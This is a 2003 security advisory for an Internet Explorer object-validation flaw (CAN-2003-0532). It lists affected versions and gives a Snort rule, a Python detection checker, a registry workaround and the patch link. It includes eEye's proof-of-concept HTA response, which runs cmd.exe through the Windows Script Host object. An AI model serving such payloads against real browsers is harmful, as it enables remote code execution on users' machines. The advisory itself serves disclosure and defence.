
Microsoft Internet Explorer Object Type Validation Vulnerability


Published: 2003-08-20
Updated: 2003-09-02
Severity:
Threat level: normal user access privileges
Error type: input validation error
Exploitation mode: server mode

BUGTRAQ ID:8456
CVE(CAN) ID:CAN-2003-0532

Affected systems
Microsoft Internet Explorer 5.0.1 SP3                        
Microsoft Internet Explorer 5.0.1 SP2                        
   -Microsoft Windows 2000 Advanced Server                  
   -Microsoft Windows 2000 Advanced Server SP1              
   -Microsoft Windows 2000 Advanced Server SP2              
   -Microsoft Windows 2000 Datacenter Server                
   -Microsoft Windows 2000 Datacenter Server SP1            
   -Microsoft Windows 2000 Datacenter Server SP2            
   -Microsoft Windows 2000 Professional                      
   -Microsoft Windows 2000 Professional SP1                  
   -Microsoft Windows 2000 Professional SP2                  
   -Microsoft Windows 2000 Server                            
   -Microsoft Windows 2000 Server SP1                        
   -Microsoft Windows 2000 Server SP2                        
   -Microsoft Windows 2000 Terminal Services                
   -Microsoft Windows 2000 Terminal Services SP1            
   -Microsoft Windows 2000 Terminal Services SP2            
   -Microsoft Windows 95                                    
   -Microsoft Windows 98                                    
   -Microsoft Windows NT Enterprise Server 4.0              
   -Microsoft Windows NT Enterprise Server 4.0 SP1          
   -Microsoft Windows NT Enterprise Server 4.0 SP2          
   -Microsoft Windows NT Enterprise Server 4.0 SP3          
   -Microsoft Windows NT Enterprise Server 4.0 SP4          
   -Microsoft Windows NT Enterprise Server 4.0 SP5          
   -Microsoft Windows NT Enterprise Server 4.0 SP6          
   -Microsoft Windows NT Enterprise Server 4.0 SP6a          
   -Microsoft Windows NT Server 4.0                          
   -Microsoft Windows NT Server 4.0 SP1                      
   -Microsoft Windows NT Server 4.0 SP2                      
   -Microsoft Windows NT Server 4.0 SP3                      
   -Microsoft Windows NT Server 4.0 SP4                      
   -Microsoft Windows NT Server 4.0 SP5                      
   -Microsoft Windows NT Server 4.0 SP6                      
   -Microsoft Windows NT Server 4.0 SP6a                    
   -Microsoft Windows NT Terminal Server 4.0                
   -Microsoft Windows NT Terminal Server 4.0 SP1            
   -Microsoft Windows NT Terminal Server 4.0 SP2            
   -Microsoft Windows NT Terminal Server 4.0 SP3            
   -Microsoft Windows NT Terminal Server 4.0 SP4            
   -Microsoft Windows NT Terminal Server 4.0 SP5            
   -Microsoft Windows NT Terminal Server 4.0 SP6            
   -Microsoft Windows NT Terminal Server 4.0 SP6a            
   -Microsoft Windows NT Workstation 4.0                    
   -Microsoft Windows NT Workstation 4.0 SP1                
   -Microsoft Windows NT Workstation 4.0 SP2                
   -Microsoft Windows NT Workstation 4.0 SP3                
   -Microsoft Windows NT Workstation 4.0 SP4                
   -Microsoft Windows NT Workstation 4.0 SP5                
   -Microsoft Windows NT Workstation 4.0 SP6                
   -Microsoft Windows NT Workstation 4.0 SP6a                
Microsoft Internet Explorer 5.0.1 SP1                        
   -Microsoft Windows 2000 Advanced Server                  
   -Microsoft Windows 2000 Advanced Server SP1              
   -Microsoft Windows 2000 Advanced Server SP2              
   -Microsoft Windows 2000 Datacenter Server                
   -Microsoft Windows 2000 Datacenter Server SP1            
   -Microsoft Windows 2000 Datacenter Server SP2            
   -Microsoft Windows 2000 Professional                      
   -Microsoft Windows 2000 Professional SP1                  
   -Microsoft Windows 2000 Professional SP2                  
   -Microsoft Windows 2000 Server                            
   -Microsoft Windows 2000 Server SP1                        
   -Microsoft Windows 2000 Server SP2                        
   -Microsoft Windows 2000 Terminal Services                
   -Microsoft Windows 2000 Terminal Services SP1            
   -Microsoft Windows 2000 Terminal Services SP2            
   -Microsoft Windows 95                                    
   -Microsoft Windows 98                                    
   -Microsoft Windows NT Enterprise Server 4.0              
   -Microsoft Windows NT Enterprise Server 4.0 SP1          
   -Microsoft Windows NT Enterprise Server 4.0 SP2          
   -Microsoft Windows NT Enterprise Server 4.0 SP3          
   -Microsoft Windows NT Enterprise Server 4.0 SP4          
   -Microsoft Windows NT Enterprise Server 4.0 SP5          
   -Microsoft Windows NT Enterprise Server 4.0 SP6          
   -Microsoft Windows NT Enterprise Server 4.0 SP6a          
   -Microsoft Windows NT Server 4.0                          
   -Microsoft Windows NT Server 4.0 SP1                      
   -Microsoft Windows NT Server 4.0 SP2                      
   -Microsoft Windows NT Server 4.0 SP3                      
   -Microsoft Windows NT Server 4.0 SP4                      
   -Microsoft Windows NT Server 4.0 SP5                      
   -Microsoft Windows NT Server 4.0 SP6                      
   -Microsoft Windows NT Server 4.0 SP6a                    
   -Microsoft Windows NT Terminal Server 4.0                
   -Microsoft Windows NT Terminal Server 4.0 SP1            
   -Microsoft Windows NT Terminal Server 4.0 SP2            
   -Microsoft Windows NT Terminal Server 4.0 SP3            
   -Microsoft Windows NT Terminal Server 4.0 SP4            
   -Microsoft Windows NT Terminal Server 4.0 SP5            
   -Microsoft Windows NT Terminal Server 4.0 SP6            
   -Microsoft Windows NT Terminal Server 4.0 SP6a            
   -Microsoft Windows NT Workstation 4.0                    
   -Microsoft Windows NT Workstation 4.0 SP1                
   -Microsoft Windows NT Workstation 4.0 SP2                
   -Microsoft Windows NT Workstation 4.0 SP3                
   -Microsoft Windows NT Workstation 4.0 SP4                
   -Microsoft Windows NT Workstation 4.0 SP5                
   -Microsoft Windows NT Workstation 4.0 SP6                
   -Microsoft Windows NT Workstation 4.0 SP6a                
Microsoft Internet Explorer 5.0.1                            
   -Microsoft Windows 2000 Advanced Server                  
   -Microsoft Windows 2000 Advanced Server SP1              
   -Microsoft Windows 2000 Advanced Server SP2              
   -Microsoft Windows 2000 Datacenter Server                
   -Microsoft Windows 2000 Datacenter Server SP1            
   -Microsoft Windows 2000 Datacenter Server SP2            
   -Microsoft Windows 2000 Professional                      
   -Microsoft Windows 2000 Professional SP1                  
   -Microsoft Windows 2000 Professional SP2                  
   -Microsoft Windows 2000 Server                            
   -Microsoft Windows 2000 Server SP1                        
   -Microsoft Windows 2000 Server SP2                        
   -Microsoft Windows 2000 Terminal Services                
   -Microsoft Windows 2000 Terminal Services SP1            
   -Microsoft Windows 2000 Terminal Services SP2            
   -Microsoft Windows 95                                    
   -Microsoft Windows 98                                    
   -Microsoft Windows 98SE                                  
   -Microsoft Windows NT Enterprise Server 4.0 SP3          
   -Microsoft Windows NT Enterprise Server 4.0 SP4          
   -Microsoft Windows NT Enterprise Server 4.0 SP5          
   -Microsoft Windows NT Enterprise Server 4.0 SP6          
   -Microsoft Windows NT Enterprise Server 4.0 SP6a          
   -Microsoft Windows NT Server 4.0 SP3                      
   -Microsoft Windows NT Server 4.0 SP4                      
   -Microsoft Windows NT Server 4.0 SP5                      
   -Microsoft Windows NT Server 4.0 SP6                      
   -Microsoft Windows NT Server 4.0 SP6a                    
   -Microsoft Windows NT Terminal Server 4.0 SP3            
   -Microsoft Windows NT Terminal Server 4.0 SP4            
   -Microsoft Windows NT Terminal Server 4.0 SP5            
   -Microsoft Windows NT Terminal Server 4.0 SP6            
   -Microsoft Windows NT Terminal Server 4.0 SP6a            
   -Microsoft Windows NT Workstation 4.0 SP3                
   -Microsoft Windows NT Workstation 4.0 SP4                
   -Microsoft Windows NT Workstation 4.0 SP5                
   -Microsoft Windows NT Workstation 4.0 SP6                
   -Microsoft Windows NT Workstation 4.0 SP6a                
Microsoft Internet Explorer 5.5 SP2                          
   -Microsoft Windows 2000 Advanced Server                  
   -Microsoft Windows 2000 Advanced Server SP1              
   -Microsoft Windows 2000 Advanced Server SP2              
   -Microsoft Windows 2000 Datacenter Server                
   -Microsoft Windows 2000 Datacenter Server SP1            
   -Microsoft Windows 2000 Datacenter Server SP2            
   -Microsoft Windows 2000 Professional                      
   -Microsoft Windows 2000 Professional SP1                  
   -Microsoft Windows 2000 Professional SP2                  
   -Microsoft Windows 2000 Server                            
   -Microsoft Windows 2000 Server SP1                        
   -Microsoft Windows 2000 Server SP2                        
   -Microsoft Windows 2000 Terminal Services                
   -Microsoft Windows 2000 Terminal Services SP1            
   -Microsoft Windows 2000 Terminal Services SP2            
   -Microsoft Windows 95                                    
   -Microsoft Windows 98                                    
   -Microsoft Windows 98SE                                  
   -Microsoft Windows ME                                    
   -Microsoft Windows NT Enterprise Server 4.0              
   -Microsoft Windows NT Enterprise Server 4.0 SP1          
   -Microsoft Windows NT Enterprise Server 4.0 SP2          
   -Microsoft Windows NT Enterprise Server 4.0 SP3          
   -Microsoft Windows NT Enterprise Server 4.0 SP4          
   -Microsoft Windows NT Enterprise Server 4.0 SP5          
   -Microsoft Windows NT Enterprise Server 4.0 SP6          
   -Microsoft Windows NT Enterprise Server 4.0 SP6a          
   -Microsoft Windows NT Server 4.0                          
   -Microsoft Windows NT Server 4.0 SP1                      
   -Microsoft Windows NT Server 4.0 SP2                      
   -Microsoft Windows NT Server 4.0 SP3                      
   -Microsoft Windows NT Server 4.0 SP4                      
   -Microsoft Windows NT Server 4.0 SP5                      
   -Microsoft Windows NT Server 4.0 SP6                      
   -Microsoft Windows NT Server 4.0 SP6a                    
   -Microsoft Windows NT Terminal Server 4.0                
   -Microsoft Windows NT Terminal Server 4.0 SP1            
   -Microsoft Windows NT Terminal Server 4.0 SP2            
   -Microsoft Windows NT Terminal Server 4.0 SP3            
   -Microsoft Windows NT Terminal Server 4.0 SP4            
   -Microsoft Windows NT Terminal Server 4.0 SP5            
   -Microsoft Windows NT Terminal Server 4.0 SP6            
   -Microsoft Windows NT Terminal Server 4.0 SP6a            
   -Microsoft Windows NT Workstation 4.0                    
   -Microsoft Windows NT Workstation 4.0 SP1                
   -Microsoft Windows NT Workstation 4.0 SP2                
   -Microsoft Windows NT Workstation 4.0 SP3                
   -Microsoft Windows NT Workstation 4.0 SP4                
   -Microsoft Windows NT Workstation 4.0 SP5                
   -Microsoft Windows NT Workstation 4.0 SP6                
   -Microsoft Windows NT Workstation 4.0 SP6a                
Microsoft Internet Explorer 5.5 SP1                          
   -Microsoft Windows 2000 Advanced Server                  
   -Microsoft Windows 2000 Advanced Server SP1              
   -Microsoft Windows 2000 Advanced Server SP2              
   -Microsoft Windows 2000 Datacenter Server                
   -Microsoft Windows 2000 Datacenter Server SP1            
   -Microsoft Windows 2000 Datacenter Server SP2            
   -Microsoft Windows 2000 Professional                      
   -Microsoft Windows 2000 Professional SP1                  
   -Microsoft Windows 2000 Professional SP2                  
   -Microsoft Windows 2000 Server                            
   -Microsoft Windows 2000 Server SP1                        
   -Microsoft Windows 2000 Server SP2                        
   -Microsoft Windows 2000 Terminal Services                
   -Microsoft Windows 2000 Terminal Services SP1            
   -Microsoft Windows 2000 Terminal Services SP2            
   -Microsoft Windows 95                                    
   -Microsoft Windows 98                                    
   -Microsoft Windows NT Enterprise Server 4.0              
   -Microsoft Windows NT Enterprise Server 4.0 SP1          
   -Microsoft Windows NT Enterprise Server 4.0 SP2          
   -Microsoft Windows NT Enterprise Server 4.0 SP3          
   -Microsoft Windows NT Enterprise Server 4.0 SP4          
   -Microsoft Windows NT Enterprise Server 4.0 SP5          
   -Microsoft Windows NT Enterprise Server 4.0 SP6          
   -Microsoft Windows NT Enterprise Server 4.0 SP6a          
   -Microsoft Windows NT Server 4.0                          
   -Microsoft Windows NT Server 4.0 SP1                      
   -Microsoft Windows NT Server 4.0 SP2                      
   -Microsoft Windows NT Server 4.0 SP3                      
   -Microsoft Windows NT Server 4.0 SP4                      
   -Microsoft Windows NT Server 4.0 SP5                      
   -Microsoft Windows NT Server 4.0 SP6                      
   -Microsoft Windows NT Server 4.0 SP6a                    
   -Microsoft Windows NT Terminal Server 4.0                
   -Microsoft Windows NT Terminal Server 4.0 SP1            
   -Microsoft Windows NT Terminal Server 4.0 SP2            
   -Microsoft Windows NT Terminal Server 4.0 SP3            
   -Microsoft Windows NT Terminal Server 4.0 SP4            
   -Microsoft Windows NT Terminal Server 4.0 SP5            
   -Microsoft Windows NT Terminal Server 4.0 SP6            
   -Microsoft Windows NT Terminal Server 4.0 SP6a            
   -Microsoft Windows NT Workstation 4.0                    
   -Microsoft Windows NT Workstation 4.0 SP1                
   -Microsoft Windows NT Workstation 4.0 SP2                
   -Microsoft Windows NT Workstation 4.0 SP3                
   -Microsoft Windows NT Workstation 4.0 SP4                
   -Microsoft Windows NT Workstation 4.0 SP5                
   -Microsoft Windows NT Workstation 4.0 SP6                
   -Microsoft Windows NT Workstation 4.0 SP6a                
Microsoft Internet Explorer 5.5                              
   -Microsoft Windows 2000 Advanced Server                  
   -Microsoft Windows 2000 Advanced Server SP1              
   -Microsoft Windows 2000 Advanced Server SP2              
   -Microsoft Windows 2000 Datacenter Server                
   -Microsoft Windows 2000 Datacenter Server SP1            
   -Microsoft Windows 2000 Datacenter Server SP2            
   -Microsoft Windows 2000 Professional                      
   -Microsoft Windows 2000 Professional SP1                  
   -Microsoft Windows 2000 Professional SP2                  
   -Microsoft Windows 2000 Server                            
   -Microsoft Windows 2000 Server SP1                        
   -Microsoft Windows 2000 Server SP2                        
   -Microsoft Windows 2000 Terminal Services                
   -Microsoft Windows 2000 Terminal Services SP1            
   -Microsoft Windows 2000 Terminal Services SP2            
   -Microsoft Windows 95                                    
   -Microsoft Windows 98                                    
   +Microsoft Windows ME                                    
   -Microsoft Windows NT Enterprise Server 4.0              
   -Microsoft Windows NT Enterprise Server 4.0 SP1          
   -Microsoft Windows NT Enterprise Server 4.0 SP2          
   -Microsoft Windows NT Enterprise Server 4.0 SP3          
   -Microsoft Windows NT Enterprise Server 4.0 SP4          
   -Microsoft Windows NT Enterprise Server 4.0 SP5          
   -Microsoft Windows NT Enterprise Server 4.0 SP6          
   -Microsoft Windows NT Enterprise Server 4.0 SP6a          
   -Microsoft Windows NT Server 4.0                          
   -Microsoft Windows NT Server 4.0 SP1                      
   -Microsoft Windows NT Server 4.0 SP2                      
   -Microsoft Windows NT Server 4.0 SP3                      
   -Microsoft Windows NT Server 4.0 SP4                      
   -Microsoft Windows NT Server 4.0 SP5                      
   -Microsoft Windows NT Server 4.0 SP6                      
   -Microsoft Windows NT Server 4.0 SP6a                    
   -Microsoft Windows NT Terminal Server 4.0                
   -Microsoft Windows NT Terminal Server 4.0 SP1            
   -Microsoft Windows NT Terminal Server 4.0 SP2            
   -Microsoft Windows NT Terminal Server 4.0 SP3            
   -Microsoft Windows NT Terminal Server 4.0 SP4            
   -Microsoft Windows NT Terminal Server 4.0 SP5            
   -Microsoft Windows NT Terminal Server 4.0 SP6            
   -Microsoft Windows NT Terminal Server 4.0 SP6a            
   -Microsoft Windows NT Workstation 4.0                    
   -Microsoft Windows NT Workstation 4.0 SP1                
   -Microsoft Windows NT Workstation 4.0 SP2                
   -Microsoft Windows NT Workstation 4.0 SP3                
   -Microsoft Windows NT Workstation 4.0 SP4                
   -Microsoft Windows NT Workstation 4.0 SP5                
   -Microsoft Windows NT Workstation 4.0 SP6                
   -Microsoft Windows NT Workstation 4.0 SP6a                
Microsoft Internet Explorer 6.0 SP1                          
Microsoft Internet Explorer 6.0                              
   -Microsoft Windows 2000 Advanced Server                  
   -Microsoft Windows 2000 Advanced Server SP1              
   -Microsoft Windows 2000 Advanced Server SP2              
   -Microsoft Windows 2000 Datacenter Server                
   -Microsoft Windows 2000 Datacenter Server SP1            
   -Microsoft Windows 2000 Datacenter Server SP2            
   -Microsoft Windows 2000 Professional                      
   -Microsoft Windows 2000 Professional SP1                  
   -Microsoft Windows 2000 Professional SP2                  
   -Microsoft Windows 2000 Server                            
   -Microsoft Windows 2000 Server SP1                        
   -Microsoft Windows 2000 Server SP2                        
   -Microsoft Windows 2000 Terminal Services                
   -Microsoft Windows 2000 Terminal Services SP1            
   -Microsoft Windows 2000 Terminal Services SP2            
   -Microsoft Windows 98                                    
   -Microsoft Windows 98SE                                  
   -Microsoft Windows ME                                    
   -Microsoft Windows NT Enterprise Server 4.0 SP6a          
   -Microsoft Windows NT Server 4.0 SP6a                    
   -Microsoft Windows NT Terminal Server 4.0 SP6a            
   -Microsoft Windows NT Workstation 4.0 SP6a                
   +Microsoft Windows Server 2003 Datacenter Edition        
   +Microsoft Windows Server 2003 Datacenter Edition 64-bit  
   +Microsoft Windows Server 2003 Enterprise Edition        
   +Microsoft Windows Server 2003 Enterprise Edition 64-bit  
   +Microsoft Windows Server 2003 Standard Edition          
   +Microsoft Windows Server 2003 Web Edition
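Detailed description
Internet Explorer's implementation contains an object validation vulnerability: when a page that IE receives from a server contains an object that has already been parsed, IE does not validate it again. This can cause a malicious object to be trusted and run locally with the current user's privileges.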

Test code
eEye provides the following test method:

--------------Client HTTP request---------------------------
<html>
...
<object data="www.yourinternethost.com/yourexploitwebpageorcgi.html">
</object>
</html>
------------------------------------------------------------

-------------Server HTTP Response---------------------------
HTTP/1.1 200 OK
Date: Tue, 13 May 2003 18:06:43 GMT
Server: Apache
Content-Type: application/hta
Content-Length: 191

<html>
<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("cmD.exe /k echO so loNg, and ThaNks For all yoUr EmplOyeeS");
</script>
</html>
------------------------------------------------------------


Solution
Nerijus Krukauskas <nk99@delfi.lt> provided the following Snort rule to detect this attack:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Internet Explorer Object Data Remote Execution Vulnerability"; content:"F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"; nocase; flow:from_server, established; reference:cve,CAN-2003-0532; classtype:web-application-activity; rev:1;)
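
A proxy- or log-side version of this check, as an added example (not code from the advisory, eEye, or the Snort rule's author): it applies the same case-insensitive CLSID match as the Snort rule and additionally flags an `application/hta` response returned for a URL that does not end in `.hta`, the pattern visible in the test response on this page. The function names, the suffix heuristic and the sample responses are assumptions constructed for illustration.

```python
import re

# CLSID matched by the Snort rule on this page.
WSH_CLSID = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"
# Assumption: media types this checker treats as active content.
ACTIVE_TYPES = {"application/hta"}
# Assumption: URL suffixes under which an HTA would legitimately be served.
ACTIVE_SUFFIXES = (".hta",)

# Constructed sample responses (not captured traffic). The first mirrors the
# headers of the test response on this page, with the CLSID in lower case to
# exercise the case-insensitive match; its body carries no script.
SAMPLE_HTA = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache\r\n"
    b"Content-Type: application/hta\r\n"
    b"\r\n"
    b"<html><object id='wsh' "
    b"classid='clsid:f935dc22-1cf0-11d0-adb9-00c04fd58a0b'></object></html>"
)
SAMPLE_BENIGN = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"\r\n"
    b"<html><p>hello</p></html>"
)


def parse_response(raw: bytes):
    """Split a raw HTTP response into (status line, headers dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inspect(requested_url: str, raw: bytes):
    """Return the list of findings for one request/response pair."""
    _, headers, body = parse_response(raw)
    findings = []
    # Media type without parameters such as "; charset=...".
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    # URL without query string or fragment, for the suffix comparison.
    path = requested_url.split("?", 1)[0].split("#", 1)[0].lower()
    if ctype in ACTIVE_TYPES and not path.endswith(ACTIVE_SUFFIXES):
        findings.append("content-type-mismatch")
    # Same match as the Snort rule: the CLSID anywhere in the body, any case.
    if re.search(re.escape(WSH_CLSID).encode(), body, re.IGNORECASE):
        findings.append("wsh-clsid-in-body")
    return findings


if __name__ == "__main__":
    for url, raw in [
        ("http://host.example/page.html", SAMPLE_HTA),
        ("http://host.example/index.html", SAMPLE_BENIGN),
    ]:
        print(url, inspect(url, raw))
```

The CLSID match alone also fires on pages that reference the object without the mismatched media type, so the two findings are reported separately and can be weighted differently.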

Johan Persson <orm@SENTOR.SE> provides the following temporary workaround:

Back up your registry.
Find and remove the 'F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' entry located in
HKEY_CLASSES_ROOT\typelib

Find and remove all references to Windows Scripting Host (wscript), such as:
Windows Script Host Network Object:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}
WSHRemote:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6F201542-B482-11D2-A250-00104BD35090}
Windows Script Host Shell Object:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Windows Script Host Network Object:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}

The vendor has provided a patch:

http://www.microsoft.com/technet/security/bulletin/MS03-032.asp

Related information
EEYE: Internet Explorer Object Data Remote Execution Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2003-08/0309.html